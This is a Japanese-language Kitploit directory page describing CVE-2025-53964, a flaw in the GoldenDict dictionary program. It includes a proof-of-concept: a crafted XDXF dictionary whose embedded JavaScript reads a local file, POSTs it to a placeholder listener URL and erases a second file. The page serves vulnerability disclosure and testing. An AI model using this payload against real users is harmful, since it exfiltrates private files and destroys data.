Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-53964 | Kitploit
ツール/GitHubGitHub/tigr78/cve-2025-53964
静的分析脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubtigr78/cve-2025-53964

CVE-2025-53964

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-53964

リスク評価

CVSS v3: (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L) - 9.6/10

説明

GoldenDict 1.5.0 および 1.5.1 には、ユーザーが細工された辞書を追加し、 その辞書に含まれる任意の用語を検索すると、ファイルの読み取りおよび変更が可能になる、公開された危険なメソッドがあります。

追加情報

この製品は外部の主体との対話のためのインターフェースを提供します。GoldenDict (ver. 1.5.0、1.5.1) には、適切に制限されていない危険なメソッドが含まれます。これにより、準備された悪意のある辞書がプログラムに追加されて使用されると、リモートの攻撃者はユーザーのファイルシステム上のファイルを読み取りおよび変更するアクセス権を取得できます。

脆弱性タイプ

CWE-749: Exposed Dangerous Method or Function; CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

製品ベンダー

GoldenDict Project

影響を受ける製品コードベース

GoldenDict - 1.5.0, 1.5.1

影響を受けるコンポーネント

GoldenDict 実行可能ファイル、ソースコードファイル xdxf.cc、ソースコードファイル xdxf2html.cc、ソースコードファイル stardict.cc。

攻撃タイプ

リモート

影響: コード実行

true

影響: 情報漏えい

true

CVE 影響: その他

ユーザーのファイルシステム上のファイルを読み取りおよび変更するアクセス権

攻撃ベクター

この脆弱性を悪用するには、ユーザーがプログラムに悪意のある辞書を追加し、その辞書に含まれる任意の用語を検索する必要があります。

発見者

Astra Group の開発部門におけるセキュリティ統制部のペネトレーションテストグループの専門家である Grebennikov Timofey。

参考

https://github.com/goldendict/goldendict/releases

詳細

GoldenDict は、Wikipedia とローカルにインストールされた辞書で用語を検索するためのグラフィカルプログラムです。XML マークアップを使用する XDXF 形式を含む、さまざまな辞書形式がサポートされています。辞書は、他のユーザーによってインターネット上で配布されています。

このプログラムは、Qt Widgets コンポーネントパッケージに含まれるブラウザエンジンを使用して、辞書の単語をレンダリングして表示します。

複数のセキュリティ違反が同時に発見され、これらにより重大な脆弱性が実現される可能性があります:

  1. XML コンテンツのサニタイズが行われていない;
  2. JS コードの実行が禁止されていない;
  3. CSP ポリシーが無効または脆弱。

これらの違反が組み合わさることで、インターネットからダウンロードした XDXF 辞書の XML マークアップに悪意のある JS コードを埋め込むことにより、ユーザーのファイルにアクセスできる可能性が生じます。

概念実証

Windows でこの脆弱性をテストするには、ファイルシステム内の2つの準備済みファイルに作用するスクリプトを実行できます。

  1. C:\Users\Public\Documents ディレクトリに2つのファイルを作成し、任意の内容を書き込みます:
  • secret.txt – 機密情報;
  • idea.txt – 失いたくない重要な情報。
  1. 以下の内容で XDXF 辞書 malicious_dictionary.xdxf を作成します:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xdxf lang_from="ENG" lang_to="RUS" format="logical">
    <full_name>Malicious dictionary</full_name>
    <description>You have been pwned!</description>
    <meta_info>
        <copyright>Public Domain</copyright>
    </meta_info>
    <lexicon>
        <ar>
            <k>vuln_test</k>
            <def>
                Some description...
                <script>
                    var secretFile = 'file:///C:/Users/Public/Documents/secret.txt';
                    var ideaFile = 'file:///C:/Users/Public/Documents/idea.txt';
                    var xhr = new XMLHttpRequest();
                    xhr.open('GET', secretFile, true);
                    xhr.onload = function() {
                        var secretData = xhr.responseText;
                        if (secretData.length > 0) {
                            var xhr2 = new XMLHttpRequest();
                            xhr2.open('POST', '[Target-URL]', true);
                            xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                            xhr2.send('data=' + encodeURIComponent(secretData));
                        }
                    };
                    xhr.onerror = function() {
                    };
                    xhr.send();
                    var xhr3 = new XMLHttpRequest();
                    xhr3.open('PUT', ideaFile, true);
                    xhr3.setRequestHeader('Content-Type', 'text/plain');
                    xhr3.send("");
                </script>
            </def>
        </ar>
    </lexicon>
</xdxf>

この辞書は、初期化されると secret.txt の内容をリモートサーバーに送信し、idea.txt を消去します。

  1. [Target-URL] テンプレートを、自分が制御する任意の HTTP リクエストリスナーのアドレスに置き換えます。
  2. 生成した辞書を GoldenDict のローカル辞書リストに追加します。
  3. "vuln-test" という用語を検索します。

攻撃の成功を確認します。受信者は secret.txt ファイルの内容を含むメッセージを受信し、idea.txt ファイルは空になります。

この脆弱性は Windows と Linux の両方のシステムに影響します。Linux システムでこの脆弱性を再現するには、テストファイルを保存するために別のディレクトリを使用し、そのディレクトリを悪意のあるコード内で指定する必要があります。

ツールをダウンロード